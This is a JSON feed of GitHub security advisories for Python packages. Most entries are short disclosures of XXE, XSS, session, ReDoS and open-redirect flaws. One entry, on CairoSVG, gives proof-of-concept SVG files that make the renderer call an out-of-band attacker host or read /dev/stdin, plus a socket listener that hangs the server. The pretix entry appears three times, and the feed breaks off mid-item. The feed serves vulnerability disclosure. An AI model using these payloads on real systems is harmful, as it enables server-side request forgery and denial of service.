{
    "version": "https://jsonfeed.org/version/1",
    "title": "Security Advisory for Python packages hosted at PyPI.org",
    "home_page_url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip",
    "feed_url": "https://azu.github.io/github-advisory-database-rss/pip.json",
    "description": "Security Advisory for Python packages hosted at PyPI.org on GitHub",
    "items": [
        {
            "content_html": "<p>A vulnerability was found in zwczou WeChat SDK Python 0.3.0 and classified as critical. This issue affects the function validate/to_xml. The manipulation leads to xml external entity reference. The attack may be initiated remotely. Upgrading to version 0.5.5 is able to address this issue. The name of the patch is e54abadc777715b6dcb545c13214d1dea63df6c9. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-223403.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2018-25082\">https://nvd.nist.gov/vuln/detail/CVE-2018-25082</a></li>\n<li><a href=\"https://github.com/zwczou/weixin-python/pull/30\">https://github.com/zwczou/weixin-python/pull/30</a></li>\n<li><a href=\"https://github.com/zwczou/weixin-python/commit/e54abadc777715b6dcb545c13214d1dea63df6c9\">https://github.com/zwczou/weixin-python/commit/e54abadc777715b6dcb545c13214d1dea63df6c9</a></li>\n<li><a href=\"https://github.com/zwczou/weixin-python/releases/tag/v0.5.5\">https://github.com/zwczou/weixin-python/releases/tag/v0.5.5</a></li>\n<li><a href=\"https://vuldb.com/?ctiid.223403\">https://vuldb.com/?ctiid.223403</a></li>\n<li><a href=\"https://vuldb.com/?id.223403\">https://vuldb.com/?id.223403</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-h384-ph77-3699\">https://github.com/advisories/GHSA-h384-ph77-3699</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-h384-ph77-3699",
            "title": "[weixin-python] weixin-python XML External Entity vulnerability",
            "date_modified": "2023-03-21T22:41:49.000Z",
            "date_published": "2023-03-21T18:30:19.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-h384-ph77-3699"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>When using the <a href=\"https://docs.sentry.io/platforms/python/guides/django/\">Django integration</a> of the Sentry SDK in a specific configuration it is possible to leak sensitive cookies values, including the session cookie to Sentry. These sensitive cookies could then be used by someone with access to your Sentry issues to impersonate or escalate their privileges within your application.</p>\n<p>The below must be true in order for these sensitive values to be leaked:</p>\n<ol>\n<li>Your Sentry SDK configuration has <code>sendDefaultPII</code> set to <code>True</code></li>\n<li>You are using a custom name for either of the cookies below in your Django settings.</li>\n</ol>\n<ul>\n<li><a href=\"https://docs.djangoproject.com/en/4.1/ref/settings/#std-setting-SESSION_COOKIE_NAME\"><code>SESSION_COOKIE_NAME</code></a> or </li>\n<li><a href=\"https://docs.djangoproject.com/en/4.1/ref/settings/#std-setting-CSRF_COOKIE_NAME\"><code>CSRF_COOKIE_NAME</code></a> Django settings</li>\n</ul>\n<ol start=\"3\">\n<li>You are not configured in your organization or project settings to use <a href=\"https://docs.sentry.io/product/data-management-settings/scrubbing/\">our data scrubbing features</a> to account for the custom cookie names</li>\n</ol>\n<h3 id=\"patches\">Patches</h3>\n<p>As of version <code>1.14.0</code>, the Django integration of the <code>sentry-sdk</code> will detect the custom cookie names based on your Django settings and will remove the values from the payload <em>before</em> sending the data to Sentry.</p>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p>If you can not update your <code>sentry-sdk</code> to a patched version than you can use the SDKs filtering mechanism to remove the cookies from the payload that is sent to Sentry. For error events this can be done with the <a href=\"https://docs.sentry.io/platforms/python/configuration/filtering/#using-platformidentifier-namebefore-send-\">before_send</a> callback method and for performance related events (transactions) you can use the <a href=\"https://docs.sentry.io/platforms/python/configuration/filtering/#using-platformidentifier-namebefore-send-transaction-\">before_send_transaction</a> callback method.</p>\n<p>If you'd like to handle filtering of these values on the server-side, you can also use our <a href=\"https://docs.sentry.io/product/data-management-settings/scrubbing/advanced-datascrubbing/\">advanced data scrubbing feature</a> to account for the custom cookie names. Look for the <code>$http.cookies</code>, <code>$http.headers</code>, <code>$request.cookies</code>, or <code>$request.headers</code> fields to target with your scrubbing rule.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://medium.com/@tomwolters/using-your-tools-against-you-cea4d2482ebb\">Using Your Tools Against You (Chapter8 Blog Post)</a></li>\n<li><a href=\"https://docs.sentry.io/platforms/python/configuration/filtering/\">Sentry Python SDK Filtering</a></li>\n<li><a href=\"https://docs.sentry.io/product/data-management-settings/scrubbing/advanced-datascrubbing/\">Sentry Data Scrubbing</a></li>\n</ul>\n<h3 id=\"credits\">Credits</h3>\n<ul>\n<li><a href=\"https://chapter8.com\">Tom Wolters (Chapter8)</a></li>\n</ul>\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/getsentry/sentry-python/security/advisories/GHSA-29pr-6jr8-q5jm\">https://github.com/getsentry/sentry-python/security/advisories/GHSA-29pr-6jr8-q5jm</a></li>\n<li><a href=\"https://github.com/getsentry/sentry-python/pull/1842\">https://github.com/getsentry/sentry-python/pull/1842</a></li>\n<li><a href=\"https://github.com/getsentry/sentry-python/releases/tag/1.14.0\">https://github.com/getsentry/sentry-python/releases/tag/1.14.0</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-28117\">https://nvd.nist.gov/vuln/detail/CVE-2023-28117</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-29pr-6jr8-q5jm\">https://github.com/advisories/GHSA-29pr-6jr8-q5jm</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-29pr-6jr8-q5jm",
            "title": "[sentry-sdk] Sentry SDK leaks sensitive session information when `sendDefaultPII` is set to `True`",
            "date_modified": "2023-03-22T21:49:40.000Z",
            "date_published": "2023-03-21T22:31:19.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-29pr-6jr8-q5jm"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h1 id=\"ssrf-vulnerability\">SSRF vulnerability</h1>\n<h2 id=\"summary\">Summary</h2>\n<p>When CairoSVG processes an SVG file, it can make requests to the inner host and different outside hosts.</p>\n<h2 id=\"operating-system-version-and-so-on\">Operating system, version and so on</h2>\n<p>Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9</p>\n<h2 id=\"tested-cairosvg-version\">Tested CairoSVG version</h2>\n<p>2.6.0</p>\n<h2 id=\"details\">Details</h2>\n<p>A specially crafted SVG file that loads an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization's internal resources or a DDOS attack on external resources.\nIt looks like this bug can affect websites and cause request forgery on the server.</p>\n<h2 id=\"poc\">PoC</h2>\n<ol>\n<li>Generating malicious svg file:\n1.1 CairoSVG_exploit.svg:</li>\n</ol>\n<pre><code class=\"language-svg\">&lt;?xml version=\"1.0\" standalone=\"yes\"?&gt;\n    &lt;!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"&gt;\n    &lt;svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"&gt;\n    &lt;image height=\"200\" width=\"200\" xlink:href=\"http://[jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com](http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/)/3\" /&gt;\n    &lt;style type=\"text/css\"&gt;@import url(\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/5\");&lt;/style&gt;\n    &lt;style type=\"text/css\"&gt;\n         &lt;![CDATA[\n            @import url(\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/9\");\n            rect { fill: red; stroke: blue; stroke-width: 3 }\n         ]]&gt;\n    &lt;/style&gt;\n&lt;/svg&gt;\n</code></pre>\n<p>1.2 CairoSVG_exploit_2.svg:</p>\n<pre><code class=\"language-svg\">&lt;?xml version=\"1.0\" standalone=\"yes\"?&gt;\n    &lt;!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"&gt;\n    &lt;svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"&gt;\n    &lt;defs&gt;\n        &lt;pattern id=\"img1\" patternUnits=\"userSpaceOnUse\" width=\"600\" height=\"450\"&gt;\n            &lt;image xlink:href=\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/11\" x=\"0\" y=\"0\" width=\"600\" height=\"450\" /&gt;\n        &lt;/pattern&gt;\n    &lt;/defs&gt;\n    &lt;path d=\"M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z\" fill=\"url(#img1)\" /&gt;\n&lt;/svg&gt;\n</code></pre>\n<p>1.3 CairoSVG_exploit_3.svg:</p>\n<pre><code class=\"language-svg\">&lt;?xml version=\"1.0\" standalone=\"yes\"?&gt;\n    &lt;!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"&gt;\n    &lt;svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"&gt;\n    &lt;use href=\"http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/13\" /&gt;\n&lt;/svg&gt;\n</code></pre>\n<ol start=\"2\">\n<li><p>Run some commands:\n<code>$ python3 -m cairosvg CairoSVG_exploit.svg -f png</code>\n<code>$ python3 -m cairosvg CairoSVG_exploit_2.svg -f png</code>\n<code>$ python3 -m cairosvg CairoSVG_exploit_3.svg -f png </code></p>\n</li>\n<li><p>See result requests in Burp Collaborator:\n<img alt=\"1\" src=\"https://user-images.githubusercontent.com/952243/224340068-547b1d9a-5513-48a5-9cdf-b34b693f80c2.png\"></p>\n</li>\n</ol>\n<h1 id=\"dos-vulnerability-with-ssti\">DOS vulnerability with SSTI</h1>\n<h2 id=\"summary-1\">Summary</h2>\n<p>When CairoSVG processes an SVG file, it can send requests to external hosts and wait for a response from the external server after a successful TCP handshake. This will cause the server to hang.\nIt seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.</p>\n<h2 id=\"operating-system-version-and-so-on-1\">Operating system, version and so on</h2>\n<p>Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9</p>\n<h2 id=\"tested-cairosvg-version-1\">Tested CairoSVG version</h2>\n<p>2.6.0</p>\n<h2 id=\"poc-1\">PoC</h2>\n<ol>\n<li>Generating malicious svg file:</li>\n</ol>\n<pre><code class=\"language-svg\">&lt;?xml version=\"1.0\" standalone=\"yes\"?&gt;\n    &lt;!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"&gt;\n    &lt;svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"&gt;\n    &lt;use href=\"http://192.168.56.1:1234/\" /&gt;\n&lt;/svg&gt;\n</code></pre>\n<ol start=\"2\">\n<li>In other server run this python program:</li>\n</ol>\n<pre><code class=\"language-python\">import socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind(('0.0.0.0', 1234))\ns.listen(1)\nconn, addr = s.accept()\nwith conn:\n    while True:\n        data = conn.recv(2048)\ns.close()\n</code></pre>\n<ol start=\"3\">\n<li>Run commands:\n<code>$timeout 60 python3 -m cairosvg CairoSVG_exploit_dos.svg -f png</code>\n(without timeout server will hang forever)</li>\n</ol>\n<h1 id=\"dos-vulnerability-with-stdin-file-descriptor\">DOS vulnerability with stdin file descriptor</h1>\n<h2 id=\"summary-2\">Summary</h2>\n<p>Specially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file.\nIt seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server.</p>\n<h2 id=\"operating-system-version-and-so-on-2\">Operating system, version and so on</h2>\n<p>Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9</p>\n<h2 id=\"tested-cairosvg-version-2\">Tested CairoSVG version</h2>\n<p>2.6.0</p>\n<h2 id=\"poc-2\">PoC</h2>\n<ol>\n<li>Generating malicious svg file:</li>\n</ol>\n<pre><code class=\"language-svg\">&lt;?xml version=\"1.0\" standalone=\"yes\"?&gt;\n    &lt;!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"&gt;\n    &lt;svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"&gt;\n    &lt;use href=\"file:///dev/stdin\" /&gt;\n&lt;/svg&gt;\n</code></pre>\n<ol start=\"2\">\n<li>In other server run this python program:</li>\n</ol>\n<pre><code class=\"language-python\">import socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind(('0.0.0.0', 1234))\ns.listen(1)\nconn, addr = s.accept()\nwith conn:\n    while True:\n        data = conn.recv(2048)\ns.close()\n</code></pre>\n<ol start=\"3\">\n<li>Run commands:\n<code>$timeout 60 python3 -m cairosvg cariosvg_exploit_dos.svg -f png</code></li>\n</ol>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv\">https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-27586\">https://nvd.nist.gov/vuln/detail/CVE-2023-27586</a></li>\n<li><a href=\"https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255\">https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255</a></li>\n<li><a href=\"https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53\">https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53</a></li>\n<li><a href=\"https://github.com/Kozea/CairoSVG/releases/tag/2.7.0\">https://github.com/Kozea/CairoSVG/releases/tag/2.7.0</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-rwmf-w63j-p7gv\">https://github.com/advisories/GHSA-rwmf-w63j-p7gv</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-rwmf-w63j-p7gv",
            "title": "[CairoSVG] CairoSVG improperly processes SVG files loaded from external resources",
            "date_modified": "2023-03-20T21:27:16.000Z",
            "date_published": "2023-03-20T21:27:15.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-rwmf-w63j-p7gv"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p><strong>Synopsis:</strong>  Streamlit open source publicizes a prior security fix implemented in 2021. The vulnerability affected Streamlit versions between 0.63.0 and 0.80.0 (inclusive) and was patched on April 21, 2021.  If you are using Streamlit with version before 0.63.0 or after 0.80.0, no action is required. </p>\n<h1 id=\"1-impacted-products\">1. Impacted Products</h1>\n<p>Streamilt Open Source versions between 0.63.0 and 0.80.0.</p>\n<h1 id=\"2-introduction\">2. Introduction</h1>\n<p>On April 21, 2021, Streamlit merged a patch that fixed a cross-site scripting (XSS) vulnerability in the Streamlit open source library, without an associated public advisory.  The vulnerability affected Streamlit versions between 0.63.0 and 0.80.0 (inclusive), which are no longer supported. We recommend using the latest version of our library, but so long as you are not using an affected Streamlit version, no action is required. </p>\n<h1 id=\"3-cross-site-scripting-vulnerability\">3. Cross Site Scripting Vulnerability</h1>\n<h2 id=\"31-description\">3.1 Description</h2>\n<p>On April 20, 2021, Streamlit was informed via our support forum about a XSS vulnerability in the open source library. We fixed and merged a patch remediating the vulnerability on April 21st, 2021. The issue was determined to be in the moderate severity range with a maximum CVSSv3 base score of <a href=\"https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N\">5.9</a></p>\n<h2 id=\"32-scenarios-and-attack-vectors\">3.2 Scenarios and attack vector(s)</h2>\n<p>Users of hosted Streamlit app(s) were vulnerable to a reflected XSS vulnerability. An attacker could craft a malicious URL with Javascript payloads to a Streamlit app. The attacker could then trick the user into visiting the malicious URL and, if successful, the server would render the malicious javascript payload as-is, leading to an XSS. </p>\n<h2 id=\"33-our-response\">3.3 Our response</h2>\n<p>Streamlit fixed and merged a patch for this vulnerability on April 21, 2021. The vulnerability was fixed within 24hrs of notification to Streamlit. </p>\n<h2 id=\"34-resolution\">3.4 Resolution</h2>\n<p>The vulnerability has been fixed in all Streamlit versions released since April 21, 2021.  The affected versions – those between 0.63.0 and 0.80.0 (inclusive) – are no longer supported. We recommend always using supported versions of the Streamlit open source library. Version 1.19.0 is current as of this advisory. </p>\n<h1 id=\"4-contact\">4. Contact</h1>\n<p>Please contact <a href=\"mailto:security@snowflake.com\">security@snowflake.com</a> if you have any questions regarding this advisory. If you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne.  For more information, please see our <a href=\"https://hackerone.com/snowflake?type=team\">Vulnerability Disclosure Policy</a>.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/streamlit/streamlit/security/advisories/GHSA-9c6g-qpgj-rvxw\">https://github.com/streamlit/streamlit/security/advisories/GHSA-9c6g-qpgj-rvxw</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-27494\">https://nvd.nist.gov/vuln/detail/CVE-2023-27494</a></li>\n<li><a href=\"https://github.com/streamlit/streamlit/commit/afcf880c60e5d7538936cc2d9721b9e1bc02b075\">https://github.com/streamlit/streamlit/commit/afcf880c60e5d7538936cc2d9721b9e1bc02b075</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-9c6g-qpgj-rvxw\">https://github.com/advisories/GHSA-9c6g-qpgj-rvxw</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-9c6g-qpgj-rvxw",
            "title": "[streamlit] Streamlit publishes previously-patched Cross-site Scripting vulnerability",
            "date_modified": "2023-03-17T14:43:03.000Z",
            "date_published": "2023-03-17T14:43:03.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-9c6g-qpgj-rvxw"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Generation of Error Message Containing Sensitive Information vulnerability in Apache Software Foundation Apache Airflow.This issue affects Apache Airflow: before 2.5.2. The traceback contains information that might be useful for a potential attacker to better target their attack (Python/Airflow version, node name). This information should not be shown if traceback is shown to unauthenticated user.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-25695\">https://nvd.nist.gov/vuln/detail/CVE-2023-25695</a></li>\n<li><a href=\"https://github.com/apache/airflow/pull/29501\">https://github.com/apache/airflow/pull/29501</a></li>\n<li><a href=\"https://lists.apache.org/thread/z8w6ckzs61ql365tv4d19k82o67r15p2\">https://lists.apache.org/thread/z8w6ckzs61ql365tv4d19k82o67r15p2</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-h6g5-wqqr-3mw3\">https://github.com/advisories/GHSA-h6g5-wqqr-3mw3</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-h6g5-wqqr-3mw3",
            "title": "[apache-airflow] Sensitive Information in Error Messages in Apache Airflow",
            "date_modified": "2023-03-17T21:36:37.000Z",
            "date_published": "2023-03-15T12:30:19.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-h6g5-wqqr-3mw3"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A vulnerability was found in Mobile Vikings Django AJAX Utilities and classified as problematic. This issue affects the function Pagination of the file django_ajax/static/ajax-utilities/js/pagination.js of the component Backslash Handler. The manipulation of the argument url leads to cross site scripting. The attack may be initiated remotely. The patch is on commit  329eb1dd1580ca1f9d4f95bc69939833226515c9 which has been inclused in release 1.2.8. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-222611.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2017-20182\">https://nvd.nist.gov/vuln/detail/CVE-2017-20182</a></li>\n<li><a href=\"https://vuldb.com/?ctiid.222611\">https://vuldb.com/?ctiid.222611</a></li>\n<li><a href=\"https://vuldb.com/?id.222611\">https://vuldb.com/?id.222611</a></li>\n<li><a href=\"https://github.com/vikingco/django-ajax-utilities/commit/329eb1dd1580ca1f9d4f95bc69939833226515c9\">https://github.com/vikingco/django-ajax-utilities/commit/329eb1dd1580ca1f9d4f95bc69939833226515c9</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-p4g9-c9qr-wmg5\">https://github.com/advisories/GHSA-p4g9-c9qr-wmg5</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-p4g9-c9qr-wmg5",
            "title": "[django-ajax-utilities] Cross-site Scripting in django-ajax-utilities",
            "date_modified": "2023-03-16T13:26:22.000Z",
            "date_published": "2023-03-10T03:30:15.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-p4g9-c9qr-wmg5"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>rami.io pretix before 4.17.1 allows OAuth application authorization from a logged-out session. The fixed versions are 4.15.1, 4.16.1, and 4.17.1.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-27891\">https://nvd.nist.gov/vuln/detail/CVE-2023-27891</a></li>\n<li><a href=\"https://pretix.eu/about/en/blog/20230306-release-4171/\">https://pretix.eu/about/en/blog/20230306-release-4171/</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-r76w-3wwq-jv6v\">https://github.com/advisories/GHSA-r76w-3wwq-jv6v</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-r76w-3wwq-jv6v",
            "title": "[pretix] Insufficient Session Expiration in pretix",
            "date_modified": "2023-03-14T23:01:26.000Z",
            "date_published": "2023-03-07T00:30:24.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-r76w-3wwq-jv6v"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>rami.io pretix before 4.17.1 allows OAuth application authorization from a logged-out session. The fixed versions are 4.15.1, 4.16.1, and 4.17.1.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-27891\">https://nvd.nist.gov/vuln/detail/CVE-2023-27891</a></li>\n<li><a href=\"https://pretix.eu/about/en/blog/20230306-release-4171/\">https://pretix.eu/about/en/blog/20230306-release-4171/</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-r76w-3wwq-jv6v\">https://github.com/advisories/GHSA-r76w-3wwq-jv6v</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-r76w-3wwq-jv6v",
            "title": "[pretix] Insufficient Session Expiration in pretix",
            "date_modified": "2023-03-14T23:01:26.000Z",
            "date_published": "2023-03-07T00:30:24.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-r76w-3wwq-jv6v"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>rami.io pretix before 4.17.1 allows OAuth application authorization from a logged-out session. The fixed versions are 4.15.1, 4.16.1, and 4.17.1.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-27891\">https://nvd.nist.gov/vuln/detail/CVE-2023-27891</a></li>\n<li><a href=\"https://pretix.eu/about/en/blog/20230306-release-4171/\">https://pretix.eu/about/en/blog/20230306-release-4171/</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-r76w-3wwq-jv6v\">https://github.com/advisories/GHSA-r76w-3wwq-jv6v</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-r76w-3wwq-jv6v",
            "title": "[pretix] Insufficient Session Expiration in pretix",
            "date_modified": "2023-03-14T23:01:26.000Z",
            "date_published": "2023-03-07T00:30:24.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-r76w-3wwq-jv6v"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the snowflake-connector-python PyPI package, when an attacker is able to supply arbitrary input to the get_file_transfer_type method.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2022-42965\">https://nvd.nist.gov/vuln/detail/CVE-2022-42965</a></li>\n<li><a href=\"https://research.jfrog.com/vulnerabilities/snowflake-connector-python-redos-xray-257185/\">https://research.jfrog.com/vulnerabilities/snowflake-connector-python-redos-xray-257185/</a></li>\n<li><a href=\"https://github.com/snowflakedb/snowflake-connector-python/releases/tag/v2.8.2\">https://github.com/snowflakedb/snowflake-connector-python/releases/tag/v2.8.2</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-4r6j-fwcx-94cf\">https://github.com/advisories/GHSA-4r6j-fwcx-94cf</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-4r6j-fwcx-94cf",
            "title": "[snowflake-connector-python] snowflake-connector-python is vulnerable to Regular Expression Denial of Service (ReDoS)",
            "date_modified": "2023-03-14T14:11:10.000Z",
            "date_published": "2022-11-10T12:01:17.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-4r6j-fwcx-94cf"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-22432\">https://nvd.nist.gov/vuln/detail/CVE-2023-22432</a></li>\n<li><a href=\"https://jvn.jp/en/jp/JVN78253670/\">https://jvn.jp/en/jp/JVN78253670/</a></li>\n<li><a href=\"http://web2py.com/\">http://web2py.com/</a></li>\n<li><a href=\"http://web2py.com/init/default/download\">http://web2py.com/init/default/download</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-w4r7-vm83-q2c7\">https://github.com/advisories/GHSA-w4r7-vm83-q2c7</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-w4r7-vm83-q2c7",
            "title": "[web2py] Open redirect in web2py",
            "date_modified": "2023-03-13T20:41:01.000Z",
            "date_published": "2023-03-06T00:30:16.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-w4r7-vm83-q2c7"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A flaw was found in openstack-glance. This issue could allow a remote, authenticated attacker to tamper with images, compromising the integrity of virtual machines created using these modified images.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2022-4134\">https://nvd.nist.gov/vuln/detail/CVE-2022-4134</a></li>\n<li><a href=\"https://bugs.launchpad.net/glance/+bug/1990157\">https://bugs.launchpad.net/glance/+bug/1990157</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=2147462\">https://bugzilla.redhat.com/show_bug.cgi?id=2147462</a></li>\n<li><a href=\"https://wiki.openstack.org/wiki/OSSN/OSSN-0090\">https://wiki.openstack.org/wiki/OSSN/OSSN-0090</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2016-0757\">https://nvd.nist.gov/vuln/detail/CVE-2016-0757</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-5gp5-vxj6-4257\">https://github.com/advisories/GHSA-5gp5-vxj6-4257</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-5gp5-vxj6-4257",
            "title": "[glance] OpenStack Glance Inclusion of Functionality from Untrusted Control Sphere vulnerability",
            "date_modified": "2023-03-13T19:18:28.000Z",
            "date_published": "2023-03-07T00:30:24.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-5gp5-vxj6-4257"
            },
            "tags": [
                "severity"
            ]
        },
        {
